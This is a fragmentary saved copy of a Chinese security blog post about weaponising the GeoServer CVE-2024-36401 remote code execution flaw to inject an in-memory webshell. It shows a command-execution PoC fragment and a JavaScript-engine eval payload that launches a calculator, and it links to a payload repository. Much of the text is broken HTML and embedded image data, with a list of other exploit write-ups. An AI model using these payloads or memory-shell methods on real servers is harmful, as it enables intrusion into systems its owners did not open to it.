https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/<p style=margin-top:15px;margin-bottom:15px;font-size:15px;white-space:pre-line;line-height:30px;color:#4a4a4a;letter-spacing:normal;text-align:start;visibility:visible>本文主要研究如何武器化利用，注入内存马。<h2 style='margin-top:2rem;margin-bottom:.5rem;font-weight:700;color:#f85f48;line-height:1.35;font-size:24px;letter-spacing:normal;text-align:start;text-wrap:wrap;font-family:Menlo,Monaco,"Source Code Pro",Consolas,Inconsolata,"Ubuntu Mono","DejaVu Sans Mono","Courier New","Droid Sans Mono","Hiragino Sans GB",微软雅黑,monospace !important;visibility:visible'>注入内存马</h2><p style=margin-top:15px;margin-bottom:15px;font-size:15px;white-space:pre-line;line-height:30px;color:#4a4a4a;letter-spacing:normal;text-align:start;visibility:visible>目前市面上公开的POC主要是做到了命令执行：<pre style='padding-top:8px;padding-bottom:6px;background:#2d2d2d;border-radius:0px;overflow-y:auto;color:#50616d;letter-spacing:normal;text-align:start;font-size:10px;line-height:12px;font-family:consolas,menlo,courier,"monospace","Microsoft Yahei" !important;border-width:1px !important;border-style:solid !important;border-color:#e2e2e2 !important;visibility:visible'><ol class=list-paddingleft-1 style="padding-top:10px;padding-bottom:10px;padding-left:30px;list-style-position:initial;list-style-image:initial;color:transparent;overflow-y:auto;list-style-type:none !important;visibility:visible"><li style="padding-left:1em;list-style-type:decimal;margin-top:6px !important;visibility:visible"><p style=visibility:visible><span style="color:#4a4a4a;display:block;line-height:22px;font-size:14px !important;word-break:inherit !important;white-space-collapse:collapse !important;visibility:visible"><span style="line-height:22px;display:block;word-break:inherit !important;visibility:visible"><code style="margin-left:-20px;display:flex;overflow:initial;line-height:12px;overflow-wrap:normal;border-width:0px;border-style:initial;border-color:initial;font-size:10px;font-family:inherit !important;white-space-collapse:preserve !important;visibility:visible"><span style="color:#cc99cc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">exec</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">(</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">java</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">.</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">lang</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">.</span><span style="color:#6699cc;line-height:20px;font-size:13px !important;white-space:inher
Y4tacker也在之前的文章中提到了怎么构造Js引擎的Poc：https://tttang.com/archive/1771/<pre style='padding-top:8px;padding-bottom:6px;background:#2d2d2d;border-radius:0px;overflow-y:auto;color:#50616d;letter-spacing:normal;text-align:start;font-size:10px;line-height:12px;font-family:consolas,menlo,courier,"monospace","Microsoft Yahei" !important;border-width:1px !important;border-style:solid !important;border-color:#e2e2e2 !important;visibility:visible'><ol class=list-paddingleft-1 style="padding-top:10px;padding-bottom:10px;padding-left:30px;list-style-position:initial;list-style-image:initial;color:transparent;overflow-y:auto;list-style-type:none !important;visibility:visible"><li style="padding-left:1em;list-style-type:decimal;margin-top:6px !important;visibility:visible"><p style=visibility:visible><span style="color:#4a4a4a;display:block;line-height:22px;font-size:14px !important;word-break:inherit !important;white-space-collapse:collapse !important;visibility:visible"><span style="line-height:22px;display:block;word-break:inherit !important;visibility:visible"><code style="margin-left:-20px;display:flex;overflow:initial;line-height:12px;overflow-wrap:normal;border-width:0px;border-style:initial;border-color:initial;font-size:10px;font-family:inherit !important;white-space-collapse:preserve !important;visibility:visible"><span style="color:#cc99cc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">eval</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">(</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">getEngineByName</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">(</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">javax</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">.</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">script</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">.</span><span style="color:#6699cc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">ScriptEngineManager</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">.</span><span style="color:#cc99cc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">new</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">(),</span><span style="color:#99cc99;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">'js'</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">),</span><span style="color:#99cc99;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">'java.lang.Runtime.getRuntime().exec("open -na Calculator")'</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">)</span></code></span></span></p></ol></pre><p style=margin-top:15px;margin-bottom:15px;font-size:15px;white-space:pre-line;line-height:30px;color:#4a4a4a;letter-spacing:normal;text-align:start;visibility:visible>似乎只需要把Js执行的Payload换成我之前议题中给出的Payload即可：https://github.com/yzddmr6/Java-Js-Engine-Payloads<p style=margin-top:15px;margin-bottom:15px;font-size:15px;white-space:pre-line;line-height:30px;color:#4a4a4a;letter-spacing:normal;text-align:start>但是实际上实现的时候有两个坑<h3 style='margin-top:2re
随后换成Filter连接成功<p style=margin-top:15px;margin-bottom:15px;font-size:15px;white-space:pre-line;line-height:30px;color:#4a4a4a;letter-spacing:normal;text-align:start><img class="rich_pages wxw-img" data-imgfileid=100000423 data-ratio=0.5657407407407408 data-src="https://mmbiz.qpic.cn/sz_mmbiz_png/LtiayO136fU4IFpKSwoqKg8ic71tJicvTeUHOv77xB931lQvsYBQULXh6NnzBficSlEfBt04RLVHMHiboibO1X1iahhRQ/640?wx_fmt=png&amp;from=appmsg" data-type=png data-w=1080 style="border-width:2px;border-style:solid;border-color:#eeeeee;border-radius:6px;height:auto !important;visibility:visible !important;width:677px !important" data-original-style="border-width: 2px;border-style: solid;border-color: rgb(238, 238, 238);border-radius: 6px;" data-index=10 src="data:image/webp;base64,UklGRvhPAABXRUJQVlA4IOxPAADQyQGdASo4BGMCPm00lkkkIqKkIbNJgIANiWlu/6dlL0t2lKN5SbDsvKr38U0OtOP6oU6gBtwiNK96aGhZ4TfWb4/0zbe7nhd2T9ZfotfWk/yWTx+a/7j+TXg//cv7t+zH9X9K/xn5j+4f239mf7t+2Xx3f1Hjk9D/hv+H/if8F7F/yT7Pfh/7b+5H98+a37v/of7N+Rnpb8Pf5P8y/898gX5H/L/8b/cv3U/wfqJ/z/9p7tvVf9B/uPUC9evoX+4/u/+T/8f+y9Iv+s/zPqZ+kf3P/U/b19gX8j/pf+o/vH70/4T///UX+t8KD7v/vf2w+AL+Yf23/m/3T/W/tB9L39b/4v8v/sv3G9x/6N/mP+9/nP9h+0X2F/zj+yf8j/E/5z/7f67/////76v//7sf3w9nD9wP/+IiSB953wliy78Pqji8kbB7iSxZd+H1RxeSNg9xJYsu+8q7YKEiwzefOsbvWN3rG71PUejlP9mQnowOKwcC3x8PomMJknGAMxmSYKUS1CFMQ/pYsuQbx+ovhpCsGCUS6UvGC1H+4XPwKrEUy+cCqYmNxstvIAmYCaZwuoOm+nbjYgRr2fp3fHtOgtnZMBq1QlHiQQiB5RV4Q8Cbmh6w/diZXAprWOjiwhMYesIkcOol8Z1SseSwmP2QzaCflr36TcBgTiitHr0rSqZEzCoOJ1uDEuOINebsz6XkjYPGwpyyfYuG6178o+QNYzq0+GIWdTfKXX7T1rnYASTNKKsgo+YgNdOB+w4ZSkEtg/W3ji65fLHv9yGpx1T8KA1lF987aaqo1W17LcyCqtMxz2sqpdAwt67XKmZDaPiU4OLy/YcyufFD7DR6dqnr9PEliy78Pqjh6fLQ/msRtW0fchLkAcZsIGcaidlhfCEURDQ5kuXy8TCNwMdOFEkfGe6qADRNLqdaTZ9FM+GAYKQBgneLcFS8IwB1nmJ+WjcB29c2uAd78v5ftSQ0dhFcIMdcBsD1inh8Pqji8kbB7iSu6CJu/Q+o/1rtbDXdQoSjU/yLICe9BKzlR7G/VqEF4AP4XJJrQ3wjzUweSNG7dgcMypRY2Rlkgarjj9kMxEcBUfOlBH1hXC6nY20V0XT7Im59bC/AMlFIMqlHDmFCK0ynQjPbpeIX7EcDjAdTGSopQnUczMGHqvN2Z9Kmi7Gthg9xJYssL06bXae8Xyiq4xdVS4yyEFv0QKoVUKBfYB/1ppTGBQjYwe/TRxeSNg9w6np4fD6o4KlQ0SAVcVQjE6kIJZcZ/vbOW/aAVOf6rNs3ln29daE6DzVqnDFEsnb/10cXXtS8Xm7M+l4vuD3BYeIF5FP2Ae3gQkA16MmGJH/KqiRpl4Fg0CdfhlKEgqcoFdrSSBxDkT30KG95HT55b2HlXvXU8s6Pcfb+eJLFl34fVHF5Iz9EcjZ1CignP2UhQvqb8WgsWj1opbvsJvrRnwh/kUuNNUgsYPfms4vJGwe4ksWXfh9UcXkjYPcSWLLvw02yh4SuvtHk/kUzX9GwwPKyfe7Sy1HUrqbTxSVmCOLyRsHuJLFl34fVHF5I2D3ElhiFmUgTw/XvxSgknu2Nz412BiPjxJBtgF/yYDYjS0ZUg7Q6NzxRIzXWqNDNEnYt/9lRHQrrET64hsyvV1B/BDILu71uwO2yqIZQxSJaXj1vJoFbeNEg08ZjrasRB1DVs/7TkDVKIk8CanXsIjaODAQfVGkcKvuJLDEK8jvw41XxFnWonIQmQWVW7GSVcYQlPUWyPAHtws0D8mp9Denp1CHPlzONx85rSIwUvfp6a6ZNdtpT1LrCowJeOQxKcXvQfbLWPwKDoPed0e9t9V2IIEB3bckHla/ySJhCsbJ0DZ8W2Y+M678k5Pm3/JJrzqa5+QqPRkG29QrXyYPaiGY4rPnYUMI5NesbG2pF8DfNpx0L3n32JJdFrqZqBJeyUBrjZ3UfTgdblGC78Nmy26GiBdM7we/NLwykJg9xJYVieuEcXkimkiBo0HvkKyD+DZT/A/Kx8WfLrh0X2MBhwZ0GjkYQ56f44DM3Ms6pEqYmIvzdjSUegEaWp0JlkLdNHpvWNKLyco6bzPL9aS2CG3SSjd7Heu6x3jtAjCzrYqnYk0jOTGW3hutAp6gkxfMH6ZJ7CGr3ZIZWKBb/jZJP+gqtvEj0dTaSxS9gRBVI1/EC6aCh5+aXhlH2A7hroRy8TwI2PbZEE9r6qx4PyvKwGuGHW1ZjWgJni29UFYbz1DaBf6dWcSuKx8V3SNg9vP/2pewqXn/fQV5uzPpK4ruegpvKcc7Y5sDUBYSLn9MrIEmyr4EFJhFUCUJEIsgDfoVXYuYAVLb673YrOLzxbOQ4vLOa6Fv1VByk1Rlp4nk5TGSGIfIX2jLTxPJymMkMRDTMkT00UsXzSkZ/QeUSsHsrrud2V5EjZhxWn8Q+Afp4ko6K6UywRHSDLgL2N2O79+FNZxbnYhtSiRujb3w1ljVB1ljU8zx2vwvbBP/KmghHQZQk+OZ1Z8j50jJlFypuVHVLnJyoXo9MUF8IRIIOiKL4NLySYPy+Kn7sS4GxHrhc/U9UpkR5CXx1OnmL+xF06VRbl97pgiAIUcissMDyiUikR9Fv/96Eobe8C73Skh1dc05Jx1G+Q4/q+5z0bspgtlPuBEJiALfaMVkLDF+HKEdLI6WR0fFxx8KmHhlH1+niRvTqxpAEqJ5PLEkr/9Ck61E4Ep2sUa1mZUan7N1j+n28tVOWyS1OB4mOUx856XxW6cwJ6Y47YcyCugPK6Oy49cLmxFFIY+3rEnfLwNLMiQXUSyETTge7KDAQzPjAwYkrbJpRM6Oj3msFQXSgZUC/gFOWHQykoqpwkOGMpuTRc7pHqovla124HtYjjVa/vV9mmf+HxIOMtOqbAQI3unuukAnn7IRsNX8KzQlfMgIcwBhz0NHVmplC9sqakwni3LXxe5uZGQR7bgFNZQ1R+/RA9XgoPfms4ugbfZ6WdaioqAYgDfFB2ePA8olZYYyruV74sSH4g8kItOXqk26ZtY3ezFgy08GpH00aDxD1F0N9h1qgkjPnbPM/Z/9uCDQeDCUGmpQc5v0HiKL+TU6HsvXRXRxisrmj40kHGe5X8lWV7VPubYsYDqhFlR+oqUfR6K1jkZgc4T2H7aiz5TzSH/pwPEIba9ySyxoA6G31RqdaxySSSSSRz4Oxn9B4unAW2JsQaSQOlnvFaHFFceP6ZWW79dvA/KypDd8adZR6svb9bFliupkJ2VGtLV0nmmKuN24Wy8BQM+2A6iqRJiZDFo6Z0XDiy6ENPXjRu
 
 </div>
 <div id=js_tags_preview_toast class=article-tag__error-tips style=display:none>预览时标签不可点</div>
 
 <div id=content_bottom_area><div data-len=0 class=article-tag__list style=display:none></div><div class="appmsg_card_context album_read_card" style=display:none></div><div class=rich_media_tool_area><div class=rich_media_tool__wrp><div id=js_content_end class=rich_media_tool><div class="rich_media_info weui-flex policy_tips tips_global_primary sf-hidden"></div><div class="rich_media_info weui-flex sf-hidden"></div><div id=js_bottom_opr_right class="weui-flex sns_opr_area" style=display:none></div></div></div></div></div>
 
 </div>
 </div>
 <div class="rich_media_area_primary sougou" id=sg_tj style=display:none></div>
 
 <div class=rich_media_area_extra>
 <div class=rich_media_area_extra_inner>
 
 <div id=page_bottom_area style=position:relative><div><div aria-hidden=true style=font-size:0px;height:0px></div><div class=mpda_bottom_container></div></div><div data-v-65d69abd id=js_cmt_container class="rich_media_extra rich_media_extra_discuss rich_media_extra_discuss_empty" fetch-before-ext-resp=true style=display:none></div></div>
 </div>
 </div>
 
 <div id=js_pc_qr_code class=qr_code_pc_outer style=display:block>
 <div class=qr_code_pc_inner>
 <div class=qr_code_pc>
 <img id=js_pc_qr_code_img class=qr_code_pc_img src="data:image/bmp;base64,Qk26RgAAAAAAADYEAAAoAAAAgQAAAIEAAAABAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQACAgIAAwMDAAQEBAAFBQUABgYGAAcHBwAICAgACQkJAAoKCgALCwsADAwMAA0NDQAODg4ADw8PABAQEAAREREAEhISABMTEwAUFBQAFRUVABYWFgAXFxcAGBgYABkZGQAaGhoAGxsbABwcHAAdHR0AHh4eAB8fHwAgICAAISEhACIiIgAjIyMAJCQkACUlJQAmJiYAJycnACgoKAApKSkAKioqACsrKwAsLCwALS0tAC4uLgAvLy8AMDAwADExMQAyMjIAMzMzADQ0NAA1NTUANjY2ADc3NwA4ODgAOTk5ADo6OgA7OzsAPDw8AD09PQA+Pj4APz8/AEBAQABBQUEAQkJCAENDQwBEREQARUVFAEZGRgBHR0cASEhIAElJSQBKSkoAS0tLAExMTABNTU0ATk5OAE9PTwBQUFAAUVFRAFJSUgBTU1MAVFRUAFVVVQBWVlYAV1dXAFhYWABZWVkAWlpaAFtbWwBcXFwAXV1dAF5eXgBfX18AYGBgAGFhYQBiYmIAY2NjAGRkZABlZWUAZmZmAGdnZwBoaGgAaWlpAGpqagBra2sAbGxsAG1tbQBubm4Ab29vAHBwcABxcXEAcnJyAHNzcwB0dHQAdXV1AHZ2dgB3d3cAeHh4AHl5eQB6enoAe3t7AHx8fAB9fX0Afn5+AH9/fwCAgIAAgYGBAIKCggCDg4MAhISEAIWFhQCGhoYAh4eHAIiIiACJiYkAioqKAIuLiwCMjIwAjY2NAI6OjgCPj48AkJCQAJGRkQCSkpIAk5OTAJSUlACVlZUAlpaWAJeXlwCYmJgAmZmZAJqamgCbm5sAnJycAJ2dnQCenp4An5+fAKCgoAChoaEAoqKiAKOjowCkpKQApaWlAKampgCnp6cAqKioAKmpqQCqqqoAq6urAKysrACtra0Arq6uAK+vrwCwsLAAsbGxALKysgCzs7MAtLS0ALW1tQC2trYAt7e3ALi4uAC5ubkAurq6ALu7uwC8vLwAvb29AL6+vgC/v78AwMDAAMHBwQDCwsIAw8PDAMTExADFxcUAxsbGAMfHxwDIyMgAycnJAMrKygDLy8sAzMzMAM3NzQDOzs4Az8/PANDQ0ADR0dEA0tLSANPT0wDU1NQA1dXVANbW1gDX19cA2NjYANnZ2QDa2toA29vbANzc3ADd3d0A3t7eAN/f3wDg4OAA4eHhAOLi4gDj4+MA5OTkAOXl5QDm5uYA5+fnAOjo6ADp6ekA6urqAOvr6wDs7OwA7e3tAO7u7gDv7+8A8PDwAPHx8QDy8vIA8/PzAPT09AD19fUA9vb2APf39wD4+PgA+fn5APr6+gD7+/sA/Pz8AP39/QD+/v4A////AP///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wAAAP///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wAAAP///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wAAAP///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wAAAP///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wAAAP///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wAAAP///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wAAAP///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wAAAP///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wAAAP///////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAP///////wAAAAAAAAAAAAAAAP///wAAAAAAAP///wAAAP///wAAAAAAAP///wAAAP///wAAAAAAAP///////wAAAAAAAAAAAP///wAAAP///////wAAAAAAAP///////////wAAAP///////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAP///////wAAAAAAAAAAAAAAAP///wAAAAAAAP///wAAAP///wAAAAAAAP///wAAAP///wAAAAAAAP///////wAAAAAAAAAAAP///wAAAP///////wAAAAAAAP///////////wAAAP///////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAP///////wAAAAAAAAAAAAAAAP///wAAAAAAAP///wAAAP///wAAAAAAAP///wAAAP///wAAAAAAAP///////wAAAAAAAAAAAP///wAAAP///////wAAAAAAAP///////////wAAAP///////////wAAAP///////////////////wAAAP///////wAAAAAAAAAAAAAAAP///wAAAP///wAAAAAAAAAAAAAAAAAAAP///wAAAP///wAAAAAAAP///wAAAAAAAP///////wAAAP///wAAAP///////////////////////wAAAP///////////wAAAP///////////////////wAAAP///////wAAAAAAAAAAAAAAAP///wAAAP///wAAAAAAAAAAAAAAAAAAAP///wAAAP///wAAAAAAAP///wAAAAAAAP///////wAAAP///wAAAP///////////////////////wAAAP///////////wAAAP///////////////////wAAAP///////wAAAAAAAAAAAAAAAP///wAAAP///wAAAAAAAAAAAAAAAAAAAP///wAAAP///wAAAAAAAP//
 <p>Scan to Follow</p>
 </div>
 </div>
 </div>
 </div>
 
 
<div class="wx_stream_article_slide_tip sf-hidden" id=wx_stream_article_slide_tip>
 
</div>
</div>
<div class="wx_network_msg_wrp sf-hidden" id=js_network_msg_wrp></div>
<div class="wx_expand_article sf-hidden" id=wx_expand_article>
 
 
 
</div>
<div class="wx_network_msg_wrp sf-hidden" id=js_network_msg_wrp></div>
<div data-v-0bb3dd94 role=dialog aria-modal=true aria-hidden=true tabindex=0 class=wx_bottom_modal_wrp style=visibility:hidden><div class="weui-half-screen-dialog wx_bottom_modal" style=max-height:810px><div class=weui-half-screen-dialog__bd><div class=weui-loadmore style=display:none></div><div class=wx_bottom_modal_msg_wrp style=display:none></div><div class="weui-loadmore weui-loadmore_line weui-loadmore_dot" style=display:none></div><div><p data-v-0bb3dd94 class=ad_control-tips>当前内容可能存在未经审核的第三方商业营销信息，请确认是否继续访问。</p></div><div class=weui-loadmore style=display:none></div></div><div class=weui-half-screen-dialog__ft><div data-v-0bb3dd94 class=weui-half-screen-dialog__btn-area><a data-v-0bb3dd94 href=javascript:void(0) wah-hotarea=click class="weui-btn weui-btn_default">继续访问</a><a data-v-0bb3dd94 href=javascript:void(0) wah-hotarea=click class="weui-btn weui-btn_primary">Cancel</a></div><div data-v-0bb3dd94 class=weui-half-screen-dialog__attachment-area><a data-v-0bb3dd94 href=javacript:; class=weui-link>微信公众平台广告规范指引</a></div></div></div><div class=wx_bottom_modal_mask_fixed></div><div class="weui-mask wx_bottom_modal_mask" style=opacity:1></div></div>
<div class=comment_primary_emotion_panel_wrp id=js_emotion_panel_pc style=display:none>
 
</div>
<div class=weui-dialog__wrp id=js_alert_panel style=display:none>
 
 
</div>
<div id=js_pc_weapp_code class="weui-desktop-popover weui-desktop-popover_pos-up-center weui-desktop-popover_img-text weapp_code_popover" style=display:none>
 
</div>
<div id=js_minipro_dialog role=dialog aria-modal=true tabindex=0 aria-labelledby=js_minipro_dialog_head style=display:none>
 
 
</div>
<div id=js_link_dialog role=dialog aria-modal=true tabindex=0 aria-labelledby=js_link_dialog_body style=display:none>
 
 
</div>
 
 
<span aria-hidden=true class=weui-a11y_ref style=display:none id=js_a11y_colon>: </span>
<span aria-hidden=true class=weui-a11y_ref style=display:none id=js_a11y_comma>，</span>
<span aria-hidden=true class=weui-a11y_ref style=display:none id=js_a11y_period>.</span>
<span aria-hidden=true class=weui-a11y_ref style=display:none id=js_a11y_space>&nbsp;</span>
<span aria-hidden=true class=weui-a11y_ref style=display:none id=js_a11y_type_video>Video</span>
<span aria-hidden=true class=weui-a11y_ref style=display:none id=js_a11y_type_weapp>Mini Program</span>
<span aria-hidden=true class=weui-a11y_ref style=display:none id=js_a11y_zan_btn_txt>Like</span>
<span aria-hidden=true class=weui-a11y_ref style=display:none id=js_a11y_zan_btn_tips>，轻点两下取消赞</span>
<span aria-hidden=true class=weui-a11y_ref style=display:none id=js_a11y_like_btn_txt>Wow</span>
<span aria-hidden=true class=weui-a11y_ref style=display:none id=js_a11y_like_btn_tips>，轻点两下取消在看</span>
<span aria-hidden=true class=weui-a11y_ref style=display:none id=js_a11y_share_btn_txt>Share</span>
<span aria-hidden=true class=weui-a11y_ref style=display:none id=js_a11y_comment_btn_txt>Comment</span>
<span aria-hidden=true class=weui-a11y_ref style=display:none id=js_a11y_collect_btn_txt>Favorite</span>
 
 
 
 
 
<div class=wx-root data-weui-theme=light></div><div class=wx-root data-weui-theme=dark></div><div data-v-63f48496 class=underline-container><div data-v-a1d05804 data-v-63f48496 style=position:absolute;top:0px;left:0px;right:0px><div data-v-a1d05804 class=underline_share_context style=width:100vw;display:none></div></div><div data-v-bdc8501c data-v-63f48496 class="menu_options menu_options_default menu_options_show" style=transform:scale(0);color:#ffffff><div data-v-bdc8501c class=menu_options_bar style=color:#ffffff><div data-v-63f48496 data-v-bdc8501c class=context-menu-wrap><p data-v-63f48496 data-v-bdc8501c class=data-text> people underline </p></div></div><div data-v-bdc8501c class=menu_options_tail style=color:#ffffff></div></div></div><div><span><span></span><div role=dialog aria-modal=true tabindex=0 class="weui-pc-popover__wrp wx_user_profile_dialog_pc"><div class="weui-pc-popover weui-pc-popover_radius-tail weui-pc-popover_pos-right weui-pc-popover_align-center sf-hidden"></div><div class=weui-mask_transparent style=display:none></div></div></span><span data-v-cb1503ab><span></span><div role=dialog aria-modal=true tabindex=0 class="weui-pc-popover__wrp wx_identity_dialog_pc sf-hidden"></div></span></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
 * Pico.css v1.5.6 (https://picocss.com)
 * Copyright 2019-2022 - Licensed under MIT
 */#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:.5rem;--nav-link-spacing-vertical:.5rem;--nav-link-spacing-horizontal:.5rem;--form-label-font-weight:var(--font-weight);--transition:.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media(min-width:576px){#mount{--font-size:17px}}@media(min-width:768px){#mount{--font-size:18px}}@media(min-width:992px){#mount{--font-size:19px}}@media(min-width:1200px){#mount{--font-size:20px}}@media(min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media(min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media(min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media(min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media(min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media(min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media(min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media(min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#f5f7f9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-color);--button-box-sha
-												add 漏洞分析、挖掘、IOT安全、红蓝攻防等相关文章

CC链再次挖掘
CVE-2024-36401 GeoServer远程代码执行
CobaltStrike(4.9.1)的狩猎与反狩猎 · Arui's blog
DIR-820 CVE-2022-26258漏洞复现
GeoServer Property evalute 远程代码执行漏洞 (CVE-2024-36401) 分析
GeoServer property RCE注入内存马
GeoServer历史漏洞分析-CSDN博客
ICMP_DNS 隧道处置方法 _ Linux 应急响应
ICMP_DNS 隧道处置方法 _ Windows 应急响应
_.Net ViewState反序列化实现无文件哥斯拉内存马(万户ezEip)
nginx deny限制路径绕过
从jhttpd分析到系统命令注入(CVE-2021-46227-D-Link Di-7200G 命令注入漏洞)
契约锁代码审计分析-CSDN博客
宏景eHR人力系统的代码审计(权限绕过_downlawbase注入_任意文件删除下载_反序列化RCE)
帆软channel v5反序列化绕过
帆软channel反序列化漏洞分析
某凌 EKP 前台远程命令执行漏洞分析
某园区系统登录绕过分析(大华智慧园区综合管理平台-登录绕过_ZIP上传目录穿越)
深入解析PHP CGI Windows平台远程代码执行漏洞（CVE-2024-4577_CVE-2012-1823）
漏洞挖掘之再探某园区系统(大华智慧园区综合管理平台—未授权用户添加_查看_修改_xstream反序列化RCE)
记某大学智慧云平台存在弱口令爆破_水平越权信息泄露_Wx_SessionKey篡改 任意用户登录漏洞

											
										
										
											2024-08-16 06:00:47 -07:00
+								<!DOCTYPE html> <html class style><!--
 								 Page saved with SingleFile
 								 url: https://mp.weixin.qq.com/s/beRJ8-HOMJbA43jYMMS0Pg
 								--><meta charset=utf-8><style>body{transition:opacity ease-in .2s}</style>
 								<meta name=wechat-enable-text-zoom-em content=true>
 								<meta http-equiv=X-UA-Compatible content="IE=edge">
 								<meta name=color-scheme content="light dark">
 								<meta name=viewport content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0,viewport-fit=cover">
 								<meta name=apple-mobile-web-app-capable content=yes>
 								<meta name=apple-mobile-web-app-status-bar-style content=black>
 								<meta name=format-detection content="telephone=no">
